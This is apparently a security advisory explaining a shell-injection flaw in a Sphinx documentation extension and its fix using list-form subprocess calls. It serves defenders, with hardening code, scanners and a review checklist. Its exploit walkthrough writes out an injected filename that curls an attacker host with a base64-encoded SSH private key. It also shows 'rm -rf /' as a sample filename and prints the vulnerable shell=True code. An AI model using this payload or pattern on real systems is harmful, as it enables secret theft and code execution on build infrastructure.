Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

Severity: Critical | CVE Class: Command Injection (CWE-78) | Fixed In: PR - "fix: sanitize subprocess call in gmtplot.py"

Introduction

When developers think about attack surfaces, they typically focus on web endpoints, authentication systems, or data storage. Rarely does anyone look twice at the documentation pipeline. Yet documentation tooling — especially custom Sphinx extensions that process contributor-supplied content — can harbor some of the most dangerous vulnerabilities in a codebase.

This post covers a critical shell injection vulnerability discovered and fixed in gmtplot.py, a custom Sphinx extension used to render GMT (Generic Mapping Tools) plots in documentation. The vulnerability allowed an attacker with the ability to contribute RST documentation files to execute arbitrary shell commands on any machine that built the documentation.

If your CI/CD pipeline builds docs automatically — and most modern projects do — this means remote code execution on your build infrastructure.

The Vulnerability Explained

What Is Shell Injection?

Shell injection (also known as OS command injection) occurs when an application passes unsanitized, user-controlled data to a system shell interpreter. When Python's subprocess.run() is called with shell=True, the entire command string is handed to /bin/sh for interpretation. This means the shell will parse and execute any valid shell syntax embedded in the string — including metacharacters like:

Metacharacter	Effect
`;`	Execute next command sequentially
`|`	Pipe output to another command
`&&`	Execute next command if first succeeds
`` `cmd` ``	Command substitution (backticks)
`$()`	Command substitution (modern syntax)
`>` / `>>`	Redirect output to a file

The Vulnerable Code

In docs/source/_extensions/gmtplot.py, at lines 173, 174, and 197, the extension invoked subprocess.run() like this:

# VULNERABLE CODE (before fix)
import subprocess

# ps_images[0] is derived from user-supplied RST documentation content
ps_file = ps_images[0]

# shell=True + unsanitized input = shell injection
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(f"gmt psconvert {ps_file} -A -Tf", shell=True)

# Also vulnerable at line 197
subprocess.run(f"convert {ps_file} output.png", shell=True)

The variable ps_images[0] is a file path derived from the processing of RST source files — content that documentation contributors control.

How Could It Be Exploited?

An attacker who can submit a pull request (or directly push to a branch) containing RST documentation files can craft a filename or directive that injects shell commands. Here's a concrete example:

Step 1: The attacker contributes an RST file containing a GMT plot directive with a malicious path:

.. gmtplot::
    :caption: Innocent-looking map

    # Script that generates a file with a dangerous name

Step 2: The extension processes this and constructs a path like:

legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) #

Step 3: When subprocess.run() executes with shell=True, the shell sees:

gmt psconvert legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) # -A -Tg

The shell dutifully executes both the legitimate GMT command and the attacker's injected command.
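
The mechanics of Step 3 can be reproduced harmlessly. The following is a minimal sketch, assuming a POSIX system with /bin/sh available. It substitutes `echo` for `gmt psconvert` and a harmless `echo INJECTED` for the attacker's `curl` payload; both substitutions and the helper name `run_vulnerable_pattern` are illustrative and do not come from gmtplot.py.

```python
import subprocess

def run_vulnerable_pattern(ps_file: str) -> list[str]:
    """Mimic the vulnerable call shape; `echo` stands in for `gmt psconvert`."""
    # Same construction as the vulnerable code: f-string plus shell=True.
    completed = subprocess.run(
        f"echo converting {ps_file} -A -Tg",
        shell=True,
        capture_output=True,
        text=True,
    )
    return completed.stdout.splitlines()

# Hypothetical attacker-controlled name: ';' ends the first command and
# '#' turns the trailing "-A -Tg" flags into a shell comment.
malicious = "legitimate_plot.ps; echo INJECTED #"

for line in run_vulnerable_pattern(malicious):
    print(line)
```

The second line of output comes from a command that the extension never intended to run, which is the essence of the attack.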

Real-World Impact

The consequences depend on the context in which documentation is built, but consider:

CI/CD Compromise: Most projects auto-build docs in pipelines. A malicious PR could exfiltrate secrets, install backdoors, or pivot to internal infrastructure.
Developer Machine Compromise: Any developer who checks out the branch and runs make html locally becomes a victim.
Supply Chain Attack: If documentation is built as part of a release process, an attacker could tamper with build artifacts or inject malicious code into published packages.
Secret Exfiltration: Build environments commonly contain API keys, cloud credentials, SSH keys, and deployment tokens — all accessible to injected commands.

This is not theoretical. Similar vulnerabilities have been exploited in CI/CD systems to steal secrets and compromise software supply chains.

The Fix

What Changed?

The fix eliminates the root cause by removing shell=True and passing command arguments as a list instead of a string. When subprocess.run() receives a list, Python uses execvp() to run the process directly — no shell is involved, and therefore no shell metacharacter interpretation occurs.

# FIXED CODE (after fix)
import subprocess

# ps_images[0] is still user-derived, but now safely handled
ps_file = ps_images[0]

# Pass as a list — no shell involved, metacharacters are treated as literals
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tf"], check=True)

# Also fixed at line 197
subprocess.run(["convert", ps_file, "output.png"], check=True)

Why This Works

When you pass a list to subprocess.run():

Python calls os.execvp() (or equivalent) directly
The operating system treats each list element as a discrete argument
No shell is spawned, so no shell parsing occurs
A filename like file.ps; rm -rf / is passed literally as the filename argument to gmt psconvert — the semicolon is just a character, not a command separator

The shell injection is neutralized because the shell, the interpreter that gives metacharacters their power, is never invoked.
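
To see what the child process actually receives in list form, here is a small sketch that launches a second Python interpreter as a stand-in for `gmt` and has it report its own arguments. The helper name `argv_seen_by_child` is hypothetical and exists only for this demonstration.

```python
import json
import subprocess
import sys

def argv_seen_by_child(*args: str) -> list[str]:
    """Run a child Python process in list form and return the argv it received."""
    # The child prints its arguments as JSON so they can be compared exactly.
    child_code = "import sys, json; print(json.dumps(sys.argv[1:]))"
    completed = subprocess.run(
        [sys.executable, "-c", child_code, *args],
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(completed.stdout)

# No shell is involved, so the dangerous-looking text is only ever a string.
print(argv_seen_by_child("file.ps; rm -rf /", "-A", "-Tg"))
```

The child sees exactly three arguments, and the first one still contains the semicolon and everything after it as ordinary characters.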

Additional Hardening (Defense in Depth)

Beyond the primary fix, consider these additional hardening measures:

import subprocess
from pathlib import Path

def safe_convert(ps_file: str, output_dir: str) -> None:
    """Safely convert PS file with input validation."""

    # 1. Validate the file exists and is within expected directory
    ps_path = Path(ps_file).resolve()
    allowed_base = Path(output_dir).resolve()

    # Path.is_relative_to() requires Python 3.9+
    if not ps_path.is_relative_to(allowed_base):
        raise ValueError(f"Path traversal detected: {ps_file}")
    if not ps_path.is_file():
        raise FileNotFoundError(f"PS file not found: {ps_file}")

    # 2. Validate file extension
    if ps_path.suffix.lower() not in ('.ps', '.eps'):
        raise ValueError(f"Unexpected file type: {ps_path.suffix}")

    # 3. Use list form (no shell=True): primary defense
    subprocess.run(
        ["gmt", "psconvert", str(ps_path), "-A", "-Tg"],
        capture_output=True,
        text=True,
        timeout=60,  # 4. Add timeout to prevent resource exhaustion
        check=True,  # 5. Raise on non-zero exit code
    )
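
The containment check in step 1 depends on normalizing the path before comparing it. The sketch below isolates that idea in a hypothetical helper, `is_inside`. Unlike `safe_convert`, it interprets relative candidates against the allowed base rather than the current working directory, an assumption made here so the demo does not depend on where it is run. It requires Python 3.9+ for `Path.is_relative_to()`.

```python
import tempfile
from pathlib import Path

def is_inside(candidate: str, allowed_base: Path) -> bool:
    """Return True if candidate resolves to a location under allowed_base."""
    base = allowed_base.resolve()
    # Joining an absolute candidate discards the base; resolve() collapses '..'.
    resolved = (base / candidate).resolve()
    return resolved.is_relative_to(base)

with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)
    print(is_inside("plots/map.ps", base))            # True: stays inside
    print(is_inside("plots/../../outside.ps", base))  # False: escapes via '..'
    print(is_inside("/etc/passwd", base))             # False: absolute path elsewhere
```

Comparing the raw strings instead of the resolved paths would miss the second case, because the unresolved path still begins with the base directory.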

Prevention & Best Practices

The Golden Rule: Never Use `shell=True` with External Input

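This is the single most important takeaway. Python's subprocess documentation makes the same point in its Security Considerations section: when the shell is invoked explicitly via shell=True, it is the application's responsibility to ensure that all whitespace and metacharacters are quoted appropriately to avoid shell injection vulnerabilities.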

Follow this decision tree:

Do you need shell features (pipes, redirects, globs)?
├── YES → Can you redesign to avoid them?
│         ├── YES → Redesign (preferred)
│         └── NO  → Use shell=True ONLY with fully hardcoded strings
│                   Never interpolate external data
└── NO  → Always use shell=False (list form)
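
As an illustration of the "redesign" branch, pipes and redirects can usually be wired up in Python itself. The sketch below is one possible approach, not the only one. The two stand-in commands (`PRODUCER` and `SORTER`) are assumptions for the demo, written as Python one-liners so that it runs without any external tools.

```python
import subprocess
import sys
from pathlib import Path

# Stand-in commands (assumptions for this demo): a producer and a filter.
PRODUCER = [sys.executable, "-c", "print('beta'); print('alpha')"]
SORTER = [sys.executable, "-c", "import sys; sys.stdout.writelines(sorted(sys.stdin))"]

def pipe_without_shell() -> str:
    """Equivalent of `producer | sorter`, with Python passing the data along."""
    produced = subprocess.run(PRODUCER, capture_output=True, text=True, check=True)
    filtered = subprocess.run(
        SORTER, input=produced.stdout, capture_output=True, text=True, check=True
    )
    return filtered.stdout

def redirect_without_shell(target: Path) -> None:
    """Equivalent of `producer > target`, using stdout= instead of '>'."""
    with target.open("w") as handle:
        subprocess.run(PRODUCER, stdout=handle, check=True)

print(pipe_without_shell(), end="")
```

Globs can be handled the same way: expand them with `pathlib.Path.glob()` and pass the resulting paths as separate list elements.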

Input Validation and Allowlisting

When you must work with user-supplied paths or filenames, validate them strictly:

import re

def validate_plot_filename(filename: str) -> bool:
    """Allowlist-based filename validation."""
    # Only allow letters, digits, hyphens, and underscores in the stem,
    # followed by a .ps or .eps extension. fullmatch() also rejects a
    # trailing newline, which '$' with re.match() would let through.
    # Path separators and '..' cannot match, so traversal is rejected too.
    return re.fullmatch(r'[a-zA-Z0-9_\-]+\.(ps|eps)', filename) is not None
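
To get a feel for what such an allowlist accepts and rejects, the sketch below runs a handful of candidate names through a hypothetical helper, `is_allowed_plot_name`. It uses the same character allowlist as `validate_plot_filename`, applied with `fullmatch()` so that a trailing newline is also rejected.

```python
import re

# Letters, digits, underscores, and hyphens, then a .ps or .eps extension.
ALLOWED_NAME = re.compile(r"[a-zA-Z0-9_\-]+\.(ps|eps)")

def is_allowed_plot_name(filename: str) -> bool:
    """Hypothetical helper mirroring the allowlist check for this demo."""
    return ALLOWED_NAME.fullmatch(filename) is not None

candidates = [
    "coastline_map.ps",   # plain name
    "figure-2.eps",       # hyphen in the stem
    "plot.ps; rm -rf /",  # shell metacharacters
    "../secrets.ps",      # path traversal
    "plot.ps\n",          # trailing newline
    "-Tg.ps",             # leading hyphen
]
for name in candidates:
    print(f"{name!r}: {is_allowed_plot_name(name)}")
```

The first two names and the last one pass; the others are rejected. The last case is worth noticing: a name beginning with a hyphen satisfies this allowlist, yet the called program may read it as an option (the CWE-88 argument injection case), so a stricter pattern that requires an alphanumeric first character may be appropriate.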

Use `shlex.quote()` as a Last Resort

If you absolutely cannot avoid shell=True, use shlex.quote() to escape arguments:

import shlex
import subprocess

# Last resort only — prefer list form instead
safe_path = shlex.quote(ps_file)
subprocess.run(f"gmt psconvert {safe_path} -A -Tg", shell=True)

⚠️ Warning: This is a mitigation, not a cure. The list-form approach is always preferred.
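
For a sense of what `shlex.quote()` does to a hostile value, here is a short sketch that assumes a POSIX shell. `echo` stands in for the real command, and `echo_via_shell` is a hypothetical helper.

```python
import shlex
import subprocess

def echo_via_shell(ps_file: str) -> str:
    """Run `echo` through the shell with the argument quoted by shlex.quote()."""
    quoted = shlex.quote(ps_file)
    completed = subprocess.run(
        f"echo {quoted}", shell=True, capture_output=True, text=True, check=True
    )
    return completed.stdout

print(shlex.quote("plot.ps"))              # only safe characters: returned unchanged
print(shlex.quote("plot.ps; echo PWNED"))  # wrapped in single quotes
print(echo_via_shell("plot.ps; echo PWNED"), end="")  # the shell sees one literal word
```

Two limits are worth keeping in mind: `shlex.quote()` is designed for Unix shells only, and quoting does not stop the called program from treating a value that begins with `-` as an option.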

Relevant Security Standards

Standard	Reference	Description
OWASP	A03:2021 – Injection	Injection ranks #3 in the OWASP Top 10 (2021)
CWE	CWE-78	OS Command Injection
CWE	CWE-88	Argument Injection
SANS	CWE/SANS Top 25	Most Dangerous Software Errors

Detection Tools

Add these to your security pipeline to catch similar issues:

Bandit: Python-specific SAST tool. Rule B602 flags subprocess calls made with shell=True; B603 flags subprocess calls made without a shell so that their arguments can be reviewed for untrusted input.
    pip install bandit
    bandit -r . -t B602,B603
Semgrep: Pattern-based code scanning with rules for subprocess misuse.
    semgrep --config "p/python" .
CodeQL: GitHub's semantic code analysis; has built-in queries for command injection.
Safety: Scans Python dependencies for known vulnerabilities.
Pre-commit hooks: Run Bandit automatically before every commit.
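
To make the idea behind these scanners concrete, the following is a deliberately simplified sketch of a static check for `shell=True`, built on Python's `ast` module. It is not how Bandit or Semgrep are implemented; the function name `find_shell_true_calls` is hypothetical, and it catches only the literal keyword `shell=True`, not values passed through variables.

```python
import ast

def find_shell_true_calls(source: str) -> list[int]:
    """Return line numbers of calls that pass the literal keyword shell=True."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for keyword in node.keywords:
            if (
                keyword.arg == "shell"
                and isinstance(keyword.value, ast.Constant)
                and keyword.value.value is True
            ):
                hits.append(node.lineno)
    return sorted(hits)

# The sample is only parsed, never executed.
sample = '''import subprocess
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
'''
print(find_shell_true_calls(sample))  # [2]
```

A real scanner adds data-flow analysis, configuration, and many more rules, which is why an established tool is the better choice in a pipeline.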

Secure Code Review Checklist

When reviewing code that invokes subprocesses, ask:

[ ] Is shell=True used? If so, is it absolutely necessary?
[ ] Does any part of the command string come from external input (files, environment, user input, network)?
[ ] Are file paths validated against an allowlist of expected directories?
[ ] Is there a timeout to prevent resource exhaustion?
[ ] Are errors handled to prevent information leakage via exception messages?
[ ] Is the principle of least privilege applied (does the process need all these permissions)?

A Note on Documentation Pipelines

This vulnerability highlights a frequently overlooked truth: your documentation pipeline is part of your attack surface.

Modern documentation workflows often include:

Automatic builds triggered by pull requests from external contributors
Sphinx extensions that execute code to generate examples and plots
Jupyter notebooks rendered as documentation
Auto-generated API docs that execute import statements

Each of these is a potential code execution vector. Treat your documentation build environment with the same security rigor as your production build:

Sandbox doc builds in isolated environments with no access to production secrets
Require review before building PRs from first-time contributors
Use separate secret stores — doc build environments should not have the same credentials as release pipelines
Audit custom Sphinx extensions — they often run with full filesystem and network access
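
One small piece of this, keeping secrets out of the build process's environment, can be sketched in Python. The allowlist contents and helper names below are assumptions for illustration. Scrubbing environment variables is only one layer and does not replace an isolated build environment.

```python
import json
import os
import subprocess
import sys

# Hypothetical allowlist: only variables the doc build is assumed to need.
ALLOWED_ENV_VARS = ("PATH", "HOME", "LANG")

def minimal_env(allowed=ALLOWED_ENV_VARS) -> dict[str, str]:
    """Copy only allowlisted variables from the parent environment."""
    return {name: os.environ[name] for name in allowed if name in os.environ}

def child_env_names(env: dict[str, str]) -> set[str]:
    """Report which variable names a child process actually sees."""
    code = "import os, json; print(json.dumps(sorted(os.environ)))"
    completed = subprocess.run(
        [sys.executable, "-c", code],
        env=env,
        capture_output=True,
        text=True,
        check=True,
    )
    return set(json.loads(completed.stdout))

# A fake secret in the parent environment does not reach the child.
os.environ["DEMO_SECRET_TOKEN"] = "not-a-real-secret"
print("DEMO_SECRET_TOKEN" in child_env_names(minimal_env()))  # False
```

The same `env=minimal_env()` argument could be passed when launching the documentation build itself, so that any code the build executes starts without the parent's credentials.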

Conclusion

A single shell=True in a documentation extension turned a benign plot-rendering tool into a potential remote code execution vulnerability. The fix was straightforward — replace string interpolation with a properly structured argument list — but the implications were significant.

Key takeaways:

shell=True + user input = shell injection. This is one of the most reliable rules in security.
Documentation tooling is an attack surface. CI/CD pipelines that auto-build docs are especially at risk.
The fix is simple: use subprocess.run(["cmd", "arg1", "arg2"]) instead of subprocess.run(f"cmd {arg}", shell=True).
Layer your defenses: input validation, path restrictions, and static analysis tools complement the primary fix.
Automate detection: Bandit and Semgrep can catch these issues before they reach production.

Security vulnerabilities don't only live in authentication systems and API endpoints. They hide in build scripts, test helpers, and documentation generators — the parts of a codebase that developers trust implicitly. The best defense is consistent, skeptical review of any code that touches external input, regardless of how "internal" it seems.

Secure every layer. Trust no input.

This vulnerability was identified and fixed as part of an automated security scanning process. If you maintain Sphinx extensions or other documentation tooling that invokes subprocesses, audit your code for similar patterns today.

References: CWE-78 | OWASP Injection | Python subprocess docs | Bandit B602
